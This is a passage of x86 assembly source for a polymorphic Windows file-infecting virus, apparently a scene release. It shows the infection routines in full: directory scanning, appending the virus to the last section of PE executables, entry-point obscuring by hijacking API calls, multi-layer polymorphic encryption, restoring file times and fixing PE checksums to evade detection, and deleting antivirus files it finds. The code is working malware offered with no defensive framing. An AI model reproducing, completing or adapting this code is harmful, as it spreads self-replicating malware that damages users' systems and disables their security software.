FILE_ATTRIBUTE_COMPRESSED or /
FILE_ATTRIBUTE_SYSTEM

jnz DoFindNext

;============================================================
;Save file time
;============================================================

cld
lea esi,dword ptr [ebx+WFD_ftCreationTime]
lea edi,dword ptr [ebp+FT_CreationTime]

movsd ; ftCreationTime ( dwLowDateTime )
movsd ; ftCreationTime ( dwHighDateTime )

movsd ; ftLastAccessTime ( dwLowDateTime )
movsd ; ftLastAccessTime ( dwHighDateTime )

movsd ; ftLastWriteTime ( dwLowDateTime )
movsd ; ftLastWriteTime ( dwHighDateTime )

;============================================================
;Check if file size is allowed
;============================================================

lodsd ; EDI points to WFD_nFileSizeHigh
or eax,eax
jnz DoFindNext
lodsd
cmp eax,0FFFFFFFFh- /
(size_virtual+(NUMBER_OF_POLY_LAYERS*00004000h))

jae DoFindNext

cmp eax,inf_size
jbe DoFindNext

;============================================================
;Save the file size for l8r use
;============================================================

mov dword ptr [ebp+FileSizeOnDisk],eax

;============================================================
;Check if file is already infected, using size padding
;============================================================

SIZE_PADDING equ 00000065h

mov ecx,SIZE_PADDING
xor edx,edx
div ecx
or edx,edx
jz DoFindNext

;============================================================
;Get complete path + filename and convert it to upper case
;============================================================

mov esi,dword ptr [ebx+FindStack_Ptr2SearchPath]
lea edi,dword ptr [ebp+BufStrFilename]
call parse_filename
lea esi,dword ptr [ebx+WFD_szFileName]
mov edi,edx
call parse_filename

; al -> Null
; edx -> Points to filename at the end of path
; edi -> Points 1byte above the null terminator

;============================================================
;Check file extension
;============================================================

lea esi,dword ptr [edi-00000005h]
call get_str_crc32

lea esi,dword ptr [ebp+TblCRC32szEXT]
mov ecx,NumberOfExt
CheckExtLoop: lodsd
sub eax,edx
jnz NoInterested

;============================================================
;Extension match... Infect file
;============================================================

call FileInfection
jmp short DoFindNext

NoInterested: loop CheckExtLoop

;============================================================
;None of our infectable extensions match
;Lets see if this file is an AV related file...
;============================================================

lea esi,dword ptr [ebp+BufStrFilename]
mov edi,esi
call parse_filename ;Parse and reparse

mov esi,edx
call get_str_crc32

lea esi,dword ptr [ebp+TblCRC32AV]
mov ecx,NumberOfAV
CheckAVLoop: lodsd
sub eax,edx
jnz AvNoMatch

;============================================================
;AV file found... Reset its attributes and delete it
;============================================================

lea esi,dword ptr [ebp+BufStrFilename]

push eax ; 00000000h
push esi
call dword ptr [ebp+a_SetFileAttributesA]

push esi
call dword ptr [ebp+a_DeleteFileA]

jmp short DoFindNext

AvNoMatch: loop CheckAVLoop

;============================================================
;Before looking for more files lets sleep a while
;============================================================

DoFindNext: mov eax,00000800h
call get_rnd_range
add eax,00000400h
push eax
call dword ptr [ebp+a_Sleep]

;============================================================
;Find next directory or file
;============================================================

push ebx ; lpFindFileData
push dword ptr [ebx+FindStack_Ptr2FindHandle]

call dword ptr [ebp+a_FindNextFileA]

or eax,eax
jnz GoFindRecord

ErrorFindFirst: mov eax,00002000h
call get_rnd_range
add eax,00001000h
push eax
call dword ptr [ebp+a_Sleep]

push dword ptr [ebx+FindStack_Ptr2FindHandle]
call dword ptr [ebp+a_FindClose]

mov esp,ebx
add esp,SIZEOF_WIN32_FIND_DATA + 00000004h
ret

;============================================================================
;Infect PE files
;
;On entry:
; BufStrFilename -> Buffer that contains complete path and
; filename
; DirectFindData -> Win32 Find Data structure filled with
; information about the file to infect
;============================================================================

FileInfection: push ebx
lea esi,dword ptr [ebp+BufStrFilename]
mov edi,esi
call parse_filename
mov esi,edx

;****************************************************************************
; mov eax,dword ptr [esi]
; cmp eax,'TAOG'
; jne ExitFileInf
;****************************************************************************

;============================================================
;Avoid some files from being infected
;============================================================

CheckFileName: push esi
mov ecx,00000002h
call get_crc32
lea esi,dword ptr [ebp+avoid_tbl]
mov ecx,avoid_num
AvoidLoop: lodsd
cmp eax,edx
jne NextAvoid

pop esi
jmp ExitFileInf

NextAvoid: loop AvoidLoop
pop esi
lodsb
cmp al,'.'
jne CheckFileName

;============================================================
;Check if file is protected by Windows File Protection
;(Windows 2000 only)
;============================================================

cmp dword ptr [ebp+hSFC],00000000h
jz NotProtected
lea eax,dword ptr [ebp+BufStrFilename]
push eax
push 00000000h
call dword ptr [ebp+a_SfcIsFileProtected]
or eax,eax
jnz ExitFileInf

;============================================================
;Try to infect this file
;============================================================

NotProtected: call TryAttach

;============================================================
;Exit file infection
;============================================================

ExitFileInf: pop ebx
ret

;============================================================================
;Infect file routines
;
;On entry:
; BufStrFilename -> Buffer filled with path + filename
;============================================================================

SEH_Block_0001 macro
add esp,-cPushad
jnz Ape_err
endm

;============================================================
;Open target file for read-only access
;============================================================

TryAttach: call FileMapRO
or eax,eax
jz inf_file_err

;============================================================
;Register ebx contains the base address of the target file
;all along infection routines
;============================================================

mov ebx,eax

;============================================================
;Check for MZ signature at base address
;============================================================

cld
cmp word ptr [ebx],IMAGE_DOS_SIGNATURE
jne inf_close_file

;============================================================
;Check file address of relocation table
;============================================================

cmp word ptr [ebx+MZ_lfarlc],0040h
jb inf_close_file

;============================================================
;Now go to the pe header and check for the PE signature
;============================================================

mov esi,dword ptr [ebx+MZ_lfanew]
mov eax,dword ptr [ebp+FileSizeOnDisk]
shr eax,01h
cmp esi,eax
jae inf_close_file

add esi,ebx
lodsd
cmp eax,IMAGE_NT_SIGNATURE
jne inf_close_file

;============================================================
;Check machine field in IMAGE_FILE_HEADER
;just allow i386 PE files
;============================================================

cmp word ptr [esi+FH_Machine],IMAGE_FILE_MACHINE_I386
jne inf_close_file

;============================================================
;Now check the characteristics, look if file
;is an executable
;============================================================

mov ax,word ptr [esi+FH_Characteristics]
test ax,IMAGE_FILE_EXECUTABLE_IMAGE or /
IMAGE_FILE_32BIT_MACHINE

jz inf_close_file

;============================================================
;Avoid DLL's
;============================================================

; Removed to allow .CPL infection
;
; test ax,IMAGE_FILE_DLL
; jnz inf_close_file

;============================================================
;Virus resides on last section
;============================================================

call get_last_sh
jecxz inf_close_file

;============================================================
;Check subsystem, only GUI applications allowed
;============================================================

movzx eax,word ptr [esi+OH_Subsystem]
cmp eax,IMAGE_SUBSYSTEM_WINDOWS_GUI
jne inf_close_file

;============================================================
;Save RVA of last section
;============================================================

mov eax,edi
sub eax,ebx
mov dword ptr [ebp+virus_sh],eax

;============================================================
;This is an attempt to avoid offending PE file formats
;============================================================

mov eax,dword ptr [edi+SH_PointerToRawData]
add eax,dword ptr [edi+SH_SizeOfRawData]
add eax,dword ptr [esi+OH_FileAlignment]
cmp eax,dword ptr [ebp+FileSizeOnDisk]
jb inf_close_file

;============================================================
;Save a pointer to imports
;============================================================

mov eax,dword ptr [esi+ /
OH_DataDirectory+ /
DE_Import+ /
DD_VirtualAddress]

mov dword ptr [ebp+FileImport],eax

;============================================================
;Go to relocations
;============================================================

mov eax,dword ptr [esi+ /
OH_DataDirectory+ /
DE_BaseReloc+ /
DD_VirtualAddress]
or eax,eax
jz cant_overwrite

;============================================================
;Relocations section is the last section?
;============================================================

sub eax,dword ptr [edi+SH_VirtualAddress]
jz got_vir_offset

;============================================================
;We cant overwrite relocations...
;...lets attach the virus to the end of last section
;============================================================

cant_overwrite: mov eax,dword ptr [edi+SH_SizeOfRawData]
mov edx,dword ptr [edi+SH_VirtualSize]
cmp eax,edx
jae got_vir_offset
mov eax,edx

got_vir_offset: add eax,dword ptr [edi+SH_PointerToRawData]
mov dword ptr [ebp+vir_offset],eax

;============================================================
;Search inside host code...
;============================================================

@SEH_SetupFrame <SEH_Block_0001>
xor ecx,ecx
pushad

call DoEPO
mov dword ptr [esp+Pushad_ecx],ecx

Ape_err: popad
@SEH_RemoveFrame

jecxz inf_close_file
mov dword ptr [ebp+inject_offs],ecx

;============================================================
;Close file...
;============================================================

call FileUnmapRO

;============================================================
;...and remap with oversize
;============================================================

call FileMapRW
or eax,eax
jz inf_file_err

add dword ptr [ebp+virus_sh],eax
mov ebx,eax

;============================================================
;Move virus to file
;============================================================

lea esi,dword ptr [ebp+viro_sys]
mov edi,dword ptr [ebp+vir_offset]
add edi,ebx

push edi

mov ecx,inf_size
cld
rep movsb

;============================================================
;Save original code
;============================================================

mov esi,dword ptr [ebp+inject_offs]
add esi,ebx

pop edi
push edi

add edi,org_code-viro_sys
cld
movsb
movsd

;============================================================
;Save some registers on 1st decryptor
;============================================================

mov ecx,00000004h
push ecx

lea edi,dword ptr [ebp+TblStdPshP]
cld
CleanStdLoop: mov eax,00000004h
sub eax,ecx
stosd
loop CleanStdLoop

pop ecx
push ecx

lea edi,dword ptr [ebp+PshPStepIndex]
GenTblStdLoop: mov eax,00000004h
call get_rnd_range
lea esi,dword ptr [ebp+TblStdPshP+eax*04h]
lodsd
cmp eax,0FFFFFFFFh
jz GenTblStdLoop
stosd
mov dword ptr [esi-00000004h],0FFFFFFFFh
loop GenTblStdLoop

pop ecx

lea esi,dword ptr [ebp+PshPStepIndex]

pop edi
push edi

add edi,TblDoPolyPops-viro_sys

DoPolyPopsLoop: lodsd
lea edx,dword ptr [ebp+eax+TblDoPop]
mov al,byte ptr [edx]
stosb
loop DoPolyPopsLoop

;============================================================
;Prepare first decryptor mark
;============================================================

mov byte ptr [ebp+IsFirst],cl

;============================================================
;Initialize size of all decryptors
;============================================================

mov dword ptr [ebp+decryptor_size],ecx

;============================================================
;Get CRC32 of main virus body and save it for l8r use
;============================================================

pop esi
push esi

add esi,CRC_protected-viro_sys

mov ecx,SizeOfProtect
call get_crc32

pop edi

mov dword ptr [edi+ViralChecksum-viro_sys],edx

;============================================================
;Generate polymorphic encryption
;============================================================

add edi,inf_size

mov edx,dword ptr [ebp+vir_offset]
mov eax,NUMBER_OF_POLY_LAYERS
call get_rnd_range
inc eax
inc eax
mov ecx,eax

each_layer: push ecx
cmp ecx,00000001h
jne Set1stFlag
mov dword ptr [ebp+IsFirst],0FFh
Set1stFlag: mov ecx,dword ptr [ebp+decryptor_size]
add ecx,inf_size
mov esi,dword ptr [ebp+vir_offset]
call Mutate
add dword ptr [ebp+decryptor_size],ecx
pop ecx
loop each_layer

;============================================================
;Insert a call to virus code over the api call
;============================================================

mov edi,dword ptr [ebp+inject_offs]
add edi,ebx
mov al,0E8h
stosb
push edi

;============================================================
;Calculate the CALL displacement
;============================================================

call get_code_sh

mov eax,dword ptr [esi+OH_FileAlignment]
mov dword ptr [ebp+raw_align],eax

mov eax,dword ptr [ebp+inject_offs]
sub eax,dword ptr [edi+SH_PointerToRawData]
add eax,dword ptr [edi+SH_VirtualAddress]
push eax

mov eax,dword ptr [ebp+entry_point]
sub eax,00000005h
sub eax,ebx

mov edi,dword ptr [ebp+virus_sh]
sub eax,dword ptr [edi+SH_PointerToRawData]
add eax,dword ptr [edi+SH_VirtualAddress]

pop edx
sub eax,edx
pop edi
stosd

mov edi,dword ptr [ebp+virus_sh]

;============================================================
;Set read/write access on virus section
;============================================================

or dword ptr [edi+SH_Characteristics], /
IMAGE_SCN_MEM_READ or IMAGE_SCN_MEM_WRITE

;============================================================
;Dont share virus section
;============================================================

and dword ptr [edi+SH_Characteristics], /
not IMAGE_SCN_MEM_SHARED

;============================================================
;Update SizeOfRawData
;============================================================

mov eax,dword ptr [ebp+vir_offset]
add eax,dword ptr [ebp+decryptor_size]
add eax,inf_size
mov edx,dword ptr [edi+SH_PointerToRawData]
mov dword ptr [ebp+fix_size],edx
sub eax,edx
cmp eax,dword ptr [edi+SH_SizeOfRawData]
jbe RawSizeOk

;============================================================
;If we changed SizeOfRawData round up to nearest
;file alignment
;============================================================

xor edx,edx
mov ecx,dword ptr [ebp+raw_align]
div ecx
inc eax
mul ecx
mov edx,dword ptr [edi+SH_SizeOfRawData]
mov dword ptr [edi+SH_SizeOfRawData],eax
sub eax,edx

test dword ptr [edi+SH_Characteristics], /
IMAGE_SCN_CNT_INITIALIZED_DATA
jz RawSizeOk
add dword ptr [esi+OH_SizeOfInitializedData],eax

;============================================================
;Update VirtualSize
;============================================================

RawSizeOk: mov eax,dword ptr [edi+SH_SizeOfRawData]
add dword ptr [ebp+fix_size],eax
add eax,size_virtual-inf_size
cmp eax,dword ptr [edi+SH_VirtualSize]
jbe VirtualSizeOk

mov dword ptr [edi+SH_VirtualSize],eax

;============================================================
;Update SizeOfImage
;============================================================

VirtualSizeOk: mov eax,dword ptr [edi+SH_VirtualAddress]
add eax,dword ptr [edi+SH_VirtualSize]
xor edx,edx
mov ecx,dword ptr [esi+OH_SectionAlignment]
div ecx
inc eax
mul ecx
mov dword ptr [esi+OH_SizeOfImage],eax

;============================================================
;Find any data directory entry pointing to last section
;============================================================

mov ecx,IMAGE_NUMBEROF_DIRECTORY_ENTRIES
lea edx,dword ptr [esi+OH_DataDirectory]
FDataPtr2Last: mov eax,dword ptr [edx]
cmp eax,dword ptr [edi+SH_VirtualAddress]
jne NextFDataPtr

mov eax,dword ptr [edi+SH_VirtualSize]
mov dword ptr [edx+00000004h],eax
jmp short DoneFDataPtr

NextFDataPtr: add edx,00000008h
loop FDataPtr2Last

;============================================================
;Clear BASE RELOCATION field
;============================================================

DoneFDataPtr: xor eax,eax
lea edi,dword ptr [esi+ /
OH_DataDirectory+ /
DE_BaseReloc+ /
DD_VirtualAddress]
cld
stosd
stosd

;============================================================
;Compute new file checksum and update it on PE header
;============================================================

mov eax,dword ptr [ebp+fix_size]
mov ecx,SIZE_PADDING
xor edx,edx
div ecx
inc eax
mul ecx
push eax

cmp dword ptr [ebp+hIMGHLP],00000000h
jz NoChecksum

mov byte ptr [ebx+eax],00h

mov edx,eax
lea esi,dword ptr [ebp+ChecksumPE]
push esi ; CheckSum
lodsd
push esi ; HeaderSum
push edx ; FileLength
push ebx

call dword ptr [ebp+a_CheckSumMappedFile]
or eax,eax
jz NoChecksum
cmp dword ptr [esi],00000000h
jz NoChecksum

mov edx,dword ptr [esi-00000004h]
mov dword ptr [eax+ /
NT_OptionalHeader.OH_CheckSum],edx

;============================================================
;Mark file as infected and optimize file size
;============================================================

NoChecksum: pop eax
mov dword ptr [ebp+FatSize],eax
call FileUnmapRW
ret

;============================================================
;Close file mapping
;============================================================

inf_close_file: call FileUnmapRO
inf_file_err: ret

;============================================================================
;Scan host code
;
;On entry:
; ebx -> Memory image base address
;Exit:
; ecx -> Inject point offset in file
; or NULL if error
;============================================================================

DoEPO: mov edx,dword ptr [ebp+FileImport]
call RVA2RAW
mov dword ptr [ebp+ImportSH],edi

call get_code_sh
jecxz ExitApe

mov eax,dword ptr [esi+OH_ImageBase]
mov dword ptr [ebp+host_base],eax

sub edx,dword ptr [edi+SH_VirtualAddress]

mov ecx,dword ptr [edi+SH_SizeOfRawData]
sub ecx,edx

add edx,dword ptr [edi+SH_PointerToRawData] ;Entry-point RAW

lea esi,dword ptr [ebx+edx]

search_call: push ecx
xor eax,eax

lodsb
cmp al,0E8h ;Api call generated by Borland Linker?
je try_borland

cmp al,0FFh ;Api call generated by Microsoft Linker?
je try_microsoft

err_api_call: pop ecx
loop search_call
ExitApe: ret

try_borland: mov eax,esi
add eax,dword ptr [esi] ;Go to refered address
sub eax,ebx ;Convert to rva

mov edx,dword ptr [edi+SH_VirtualAddress]
cmp eax,edx
jb err_api_call ;Below code?

add edx,dword ptr [edi+SH_VirtualSize]
cmp eax,edx
jae err_api_call ;Above code?

cmp word ptr [eax+ebx-00000002h],25FFh ;JMP DWORD PTR [xxxx]
jne err_api_call

push dword ptr [eax+ebx]
pop eax
sub eax,dword ptr [ebp+host_base] ;Get a RVA again

mov edx,dword ptr [ebp+ImportSH]
mov ecx,dword ptr [edx+SH_VirtualAddress]
cmp eax,ecx
jb err_api_call ;Below imports?

add ecx,dword ptr [edx+SH_VirtualSize]
cmp eax,ecx
jae err_api_call ;Above imports?

sub eax,dword ptr [edx+SH_VirtualAddress]
add eax,dword ptr [edx+SH_PointerToRawData]

push dword ptr [eax+ebx]
pop eax

mov edx,dword ptr [ebp+ImportSH]
mov ecx,dword ptr [edx+SH_VirtualAddress]
cmp eax,ecx
jb err_api_call ;Below imports?

add ecx,dword ptr [edx+SH_VirtualSize]
cmp eax,ecx
jae err_api_call ;Above imports?

found_place: ;Use this point? or better continue the search?

call get_rnd_range
test eax,01h
jz err_api_call

pop eax
mov ecx,esi
dec ecx
sub ecx,ebx

ret

try_microsoft: cmp byte ptr [esi],15h
jne err_api_call
mov eax,dword ptr [esi+00000001h]
sub eax,dword ptr [ebp+host_base]

mov edx,dword ptr [ebp+ImportSH]
mov ecx,dword ptr [edx+SH_VirtualAddress]
cmp eax,ecx
jb err_api_call ;Below imports?

add ecx,dword ptr [edx+SH_VirtualSize]
cmp eax,ecx
jae err_api_call ;Above imports?

sub eax,dword ptr [edx+SH_VirtualAddress]
add eax,dword ptr [edx+SH_PointerToRawData]
push dword ptr [eax+ebx]
pop eax

;If file is binded eax contains the address of the API
;Lets check if eax points to a KERNEL32 API

cmp eax,dword ptr [ebp+K32CodeStart]
jb inside_import
cmp eax,dword ptr [ebp+K32CodeEnd]
jb found_place

inside_import: mov edx,dword ptr [ebp+ImportSH]
mov ecx,dword ptr [edx+SH_VirtualAddress]
cmp eax,ecx
jb err_api_call ;Below imports?

add ecx,dword ptr [edx+SH_VirtualSize]
cmp eax,ecx
jae err_api_call ;Above imports?

jmp found_place

;============================================================================
;SEH handling routines coded by Jacky Qwerty / 29A
;============================================================================

SEH_Frame: sub edx,edx
push dword ptr fs:[edx]
mov fs:[edx],esp
jmp [esp.(02h*Pshd).RetAddr]

SEH_RemoveFrame:push 00000000h
pop edx
pop dword ptr [esp.(02h*Pshd).RetAddr]
pop dword ptr fs:[edx]
pop edx
ret (Pshd)

SEH_SetupFrame: call SEH_Frame
mov eax,[esp.EH_ExceptionRecord]
test byte ptr [eax.ER_ExceptionFlags], /
EH_UNWINDING or EH_EXIT_UNWIND
mov eax,dword ptr [eax.ER_ExceptionCode]
jnz SEH_Search
add eax,-EXCEPTION_ACCESS_VIOLATION
jnz SEH_Search
mov esp,dword ptr [esp.EH_EstablisherFrame]
mov dword ptr fs:[eax],esp
jmp dword ptr [esp.(02h*Pshd).Arg1]
SEH_Search: xor eax,eax
ret

;============================================================================
;FileMapRO open and map a file for read-only access
;
;On entry:
; BufStrFilename -> Buffer filled with path + filename
;Exit:
; eax -> Base address of memory map for file or null if error
;============================================================================

;============================================================
;GetFileAttributes
;============================================================

FileMapRO: lea esi,dword ptr [ebp+BufStrFilename]
push esi ; lpFileName

call dword ptr [ebp+a_GetFileAttributesA]
cmp eax,0FFFFFFFFh
jne FileGetAttrOk

FileGetAttrErr: xor eax,eax
ret

;============================================================
;CreateFile ( GENERIC_READ )
;============================================================

FileGetAttrOk: mov dword ptr [ebp+CurFileAttr],eax
xor edi,edi

push edi ; hTemplateFile
push FILE_ATTRIBUTE_NORMAL ; dwFlagsAndAttributes
push OPEN_EXISTING ; dwCreationDisposition
push edi ; lpSecurityAttributes
push edi ; dwShareMode
push GENERIC_READ ; dwDesiredAccess
push esi ; lpFileName

call dword ptr [ebp+a_CreateFileA]

cmp eax,INVALID_HANDLE_VALUE
je FileGetAttrErr

;============================================================
;CreateFileMapping ( PAGE_READONLY )
;============================================================

mov dword ptr [ebp+h_CreateFile],eax

push edi ; lpName
push edi ; dwMaximumSizeLow
push edi ; dwMaximumSizeHigh
push PAGE_READONLY ; flProtect
push edi ; lpFileMappingAttributes
push dword ptr [ebp+h_CreateFile] ; hFile

call dword ptr [ebp+a_CreateFileMappingA]
or eax,eax
jnz OkFileMappingRO

ErrFileMapRO: push dword ptr [ebp+h_CreateFile]
call dword ptr [ebp+a_CloseHandle]

jmp FileGetAttrErr

;============================================================
;MapViewOfFile
;============================================================

OkFileMappingRO:mov dword ptr [ebp+h_FileMap],eax

push edi ; dwNumberOfBytesToMap
push edi ; dwFileOffsetLow
push edi ; dwFileOffsetHigh
push FILE_MAP_READ ; dwDesiredAccess
push eax ; hFileMappingObject

call dword ptr [ebp+a_MapViewOfFile]
or eax,eax
jnz FileViewOkRO

FileViewErrorRO:push dword ptr [ebp+h_FileMap]
call dword ptr [ebp+a_CloseHandle]

jmp ErrFileMapRO

;============================================================
;Ready!
;============================================================

FileViewOkRO: mov dword ptr [ebp+map_is_here],eax
ret

;============================================================
;UnmapRO
;============================================================

FileUnmapRO: push ebx
call dword ptr [ebp+a_UnmapViewOfFile]
jmp FileViewErrorRO

;============================================================================
;FileMapRW open and map a file for read and write access
;
;On entry:
; BufStrFilename -> Buffer filled with path + filename
;Exit:
; eax -> Base address of memory map for file or null if error
;============================================================================

;============================================================
;Calculate size of infected file
;============================================================

FileMapRW: mov eax,dword ptr [ebp+vir_offset]
add eax,( size_virtual * 02h ) + /
( NUMBER_OF_POLY_LAYERS * 00004000h )

mov ecx,SIZE_PADDING
xor edx,edx
div ecx
inc eax
mul ecx
mov dword ptr [ebp+FatSize],eax

;============================================================
;SetFileAttributes
;============================================================

lea esi,dword ptr [ebp+BufStrFilename]

push FILE_ATTRIBUTE_NORMAL ; dwFileAttributes
push esi ; lpFileName

call dword ptr [ebp+a_SetFileAttributesA]
or eax,eax
jnz FileSetAttrOk

FileSetAttrErr: xor eax,eax
ret

;============================================================
;CreateFile ( GENERIC_READ or GENERIC_WRITE )
;============================================================

FileSetAttrOk: xor edi,edi
mov dword ptr [ebp+map_is_here],edi

push edi ; hTemplateFile
push FILE_ATTRIBUTE_NORMAL ; dwFlagsAndAttributes
push OPEN_EXISTING ; dwCreationDisposition
push edi ; lpSecurityAttributes
push edi ; dwShareMode
push GENERIC_READ or GENERIC_WRITE ; dwDesiredAccess
push esi ; lpFileName

call dword ptr [ebp+a_CreateFileA]
cmp eax,INVALID_HANDLE_VALUE
jne FileOpenOkRW

FileOpenErrorRW:lea esi,dword ptr [ebp+BufStrFilename] ; Need for reverse!

push dword ptr [ebp+CurFileAttr] ; dwFileAttributes
push esi ; lpFileName
call dword ptr [ebp+a_SetFileAttributesA]

jmp FileSetAttrErr

;============================================================
;CreateFileMapping ( PAGE_READWRITE )
;============================================================

FileOpenOkRW: mov dword ptr [ebp+h_CreateFile],eax

push edi ; lpName
push dword ptr [ebp+FatSize] ; dwMaximumSizeLow
push edi ; dwMaximumSizeHigh
push PAGE_READWRITE ; flProtect
push edi ; lpFileMappingAttributes
push eax ; hFile

call dword ptr [ebp+a_CreateFileMappingA]
or eax,eax
jnz FileMapOkRW

FileMapErrorRW: cmp dword ptr [ebp+map_is_here],edi
jz FileSizeIsOk

mov esi,dword ptr [ebp+h_CreateFile]
xor eax,eax

push eax ; dwMoveMethod
push eax ; lpDistanceToMoveHigh
push dword ptr [ebp+FatSize] ; lDistanceToMove
push esi ; hFile

call dword ptr [ebp+a_SetFilePointer]
cmp eax,0FFFFFFFFh
je FileSizeIsOk

push esi ; hFile
call dword ptr [ebp+a_SetEndOfFile]

lea edx,dword ptr [ebp+FT_LastWriteTime]
push edx
sub edx,00000008h
push edx
sub edx,00000008h
push edx
push esi

call dword ptr [ebp+a_SetFileTime]

FileSizeIsOk: push dword ptr [ebp+h_CreateFile]
call dword ptr [ebp+a_CloseHandle]

jmp FileOpenErrorRW

;============================================================
;MapViewOfFile
;============================================================

FileMapOkRW: mov dword ptr [ebp+h_FileMap],eax

push dword ptr [ebp+FatSize] ; dwNumberOfBytesToMap
push edi ; dwFileOffsetLow
push edi ; dwFileOffsetHigh
push FILE_MAP_WRITE ; dwDesiredAccess
push eax ; hFileMappingObject

call dword ptr [ebp+a_MapViewOfFile]
or eax,eax
jnz FileViewOkRW

FileViewErrorRW:push dword ptr [ebp+h_FileMap]
call dword ptr [ebp+a_CloseHandle]
jmp FileMapErrorRW

FileViewOkRW: mov dword ptr [ebp+map_is_here],eax
ret

;============================================================
;UnmapRW
;============================================================

FileUnmapRW: push ebx
call dword ptr [ebp+a_UnmapViewOfFile]
jmp FileViewErrorRW

;============================================================================
;Convert RVA to RAW
;
;On entry:
; ebx -> Host base address
; edx -> RVA to convert
;On exit:
; ecx -> Pointer to RAW data or NULL if error
; edx -> Section delta offset
; esi -> Pointer to IMAGE_OPTIONAL_HEADER
; edi -> Pointer to section header
;============================================================================

RVA2RAW: cld
mov dword ptr [ebp+search_raw],edx
mov esi,dword ptr [ebx+MZ_lfanew]
add esi,ebx
lodsd
movzx ecx,word ptr [esi+FH_NumberOfSections]
jecxz err_RVA2RAW
movzx edi,word ptr [esi+FH_SizeOfOptionalHeader]
add esi,IMAGE_SIZEOF_FILE_HEADER
add edi,esi

;============================================================
;Get the IMAGE_SECTION_HEADER that contains RVA
;
;At this point:
;
;ebx -> File base address
;esi -> Pointer to IMAGE_OPTIONAL_HEADER
;edi -> Pointer to first section header
;ecx -> Number of sections
;
;Check if address of imports directory is inside this
;section
;============================================================


s_img_section: mov eax,dword ptr [ebp+search_raw]
mov edx,dword ptr [edi+SH_VirtualAddress]
sub eax,edx
cmp eax,dword ptr [edi+SH_VirtualSize]
jb section_ok

;============================================================
;Go to next section header
;============================================================

out_of_section: add edi,IMAGE_SIZEOF_SECTION_HEADER
loop s_img_section
err_RVA2RAW: ret

;============================================================
;Get raw
;============================================================

section_ok: mov ecx,dword ptr [edi+SH_PointerToRawData]
sub edx,ecx
add ecx,eax
add ecx,ebx
ret

;============================================================================
;Get code section header and entry-point information
;
;On entry:
; ebx -> Host base address
;On exit:
; ecx -> Pointer to RAW data or NULL if error
; edx -> Entry-point RVA
; esi -> Pointer to IMAGE_OPTIONAL_HEADER
; edi -> Pointer to section header
;============================================================================

get_code_sh: call get_last_sh
mov edx,dword ptr [esi+OH_AddressOfEntryPoint]
push edx
call RVA2RAW
pop edx
ret

;============================================================================
;Get pointer to last section header
;
;On entry:
; ebx -> Host base address
;On exit:
; esi -> IMAGE_OPTIONAL_HEADER
; edi -> Pointer to last section header
;============================================================================

get_last_sh: push ecx
mov esi,dword ptr [ebx+MZ_lfanew]
add esi,ebx
cld
lodsd
movzx ecx,word ptr [esi+FH_NumberOfSections]
dec ecx
mov eax,IMAGE_SIZEOF_SECTION_HEADER
mul ecx
movzx edx,word ptr [esi+FH_SizeOfOptionalHeader]
add esi,IMAGE_SIZEOF_FILE_HEADER
add eax,edx
add eax,esi
mov edi,eax
pop ecx
ret

;============================================================================
;Generate data area suitable for memory write access
;
; edi -> Base address
; ecx -> Size
;============================================================================

gen_data_area: push eax
push edx

movzx eax,byte ptr [ebp+NumberOfDataAreas]
cmp eax,NUM_DA
jae no_more_da

lea edx,dword ptr [ebp+tbl_data_area+eax*08h]

mov eax,edi
sub eax,dword ptr [ebp+map_is_here]
add eax,dword ptr [ebp+host_base]

push ecx

mov ecx,dword ptr [ebp+virus_sh]
sub eax,dword ptr [ecx+SH_PointerToRawData]
add eax,dword ptr [ecx+SH_VirtualAddress]
mov dword ptr [edx],eax

pop ecx
mov dword ptr [edx+00000004h],ecx

inc byte ptr [ebp+NumberOfDataAreas]
no_more_da: pop edx
pop eax
ret

;============================================================================
;Generate a block of random data
;============================================================================

gen_rnd_block: mov eax,0000000Ah
mov ecx,eax
call get_rnd_range
add ecx,eax
call gen_data_area
rnd_fill: mov eax,dword ptr [ebp+FileSizeOnDisk]
dec eax
sub eax,ecx
call get_rnd_range
add eax,dword ptr [ebp+map_is_here]
mov esi,eax
cld
rep movsb
ret

;============================================================================
;Linear congruent pseudorandom number generator
;============================================================================

get_rnd32: push ecx
push edx
mov eax,dword ptr [ebp+rnd32_seed]
mov ecx,41C64E6Dh
mul ecx
add eax,00003039h
and eax,7FFFFFFFh
mov dword ptr [ebp+rnd32_seed],eax
pop edx
pop ecx
ret

;============================================================================
;Returns a random num between 0 and entry eax
;============================================================================

get_rnd_range: push ecx
push edx
mov ecx,eax
call get_rnd32
xor edx,edx
div ecx
mov eax,edx
pop edx
pop ecx
ret

;============================================================================
;Perform encryption
;============================================================================

;============================================================
;This buffer will contain the code to "crypt" the virus code
;followed by a RET instruction
;============================================================

perform_crypt: db 10h dup (90h)

;============================================================================
;Generate decryptor action: Load pointer
;
;We dont need to get delta-offset, this virus assumes fixed load address
;============================================================================

gen_load_ptr: mov al,0B8h
or al,byte ptr [ebp+index_mask]
stosb
mov eax,dword ptr [ebp+host_base]
add eax,dword ptr [ebp+PtrToCrypt]
add eax,dword ptr [ebp+ptr_disp]
mov edx,dword ptr [ebp+virus_sh]
sub eax,dword ptr [edx+SH_PointerToRawData]
add eax,dword ptr [edx+SH_VirtualAddress]
test byte ptr [ebp+build_flags],CRYPT_DIRECTION
jz fix_dir_ok
push eax ;Fix upon direction
call fixed_size2ecx
xor eax,eax
mov al,byte ptr [ebp+oper_size]
push eax
mul ecx
pop ecx
sub eax,ecx
pop ecx
add eax,ecx
fix_dir_ok: stosd
ret

;============================================================================
;Generate decryptor action: Load counter
;============================================================================

;============================================================
;Easy now, just move counter random initial value
;into counter reg and calculate the end value
;============================================================

gen_load_ctr: mov al,0B8h
or al,byte ptr [ebp+counter_mask]
stosb
call fixed_size2ecx
call get_rnd32
stosd
test byte ptr [ebp+build_flags],CRYPT_CDIR
jnz counter_down
counter_up: add eax,ecx
jmp short done_ctr_dir
counter_down: sub eax,ecx
done_ctr_dir: mov dword ptr [ebp+end_value],eax
ret

;============================================================================
;Generate decryptor action: Decrypt
;============================================================================

gen_decrypt: mov eax,dword ptr [ebp+ptr_disp]
mov dword ptr [ebp+fake_ptr_disp],eax

mov eax,dword ptr [ebp+crypt_key]
mov dword ptr [ebp+fake_crypt_key],eax

mov al,byte ptr [ebp+build_flags]
mov byte ptr [ebp+fake_build_flags],al

mov al,byte ptr [ebp+oper_size]
mov byte ptr [ebp+fake_oper_size],al

mov al,byte ptr [ebp+index_mask]
mov byte ptr [ebp+fake_index_mask],al

call fake_or_not

xor eax,eax
mov al,byte ptr [ebp+oper_size]
shr eax,01h
shl eax,02h
add esi,eax
lodsd
add eax,ebp
mov esi,eax
push edi
lea edi,dword ptr [ebp+perform_crypt]
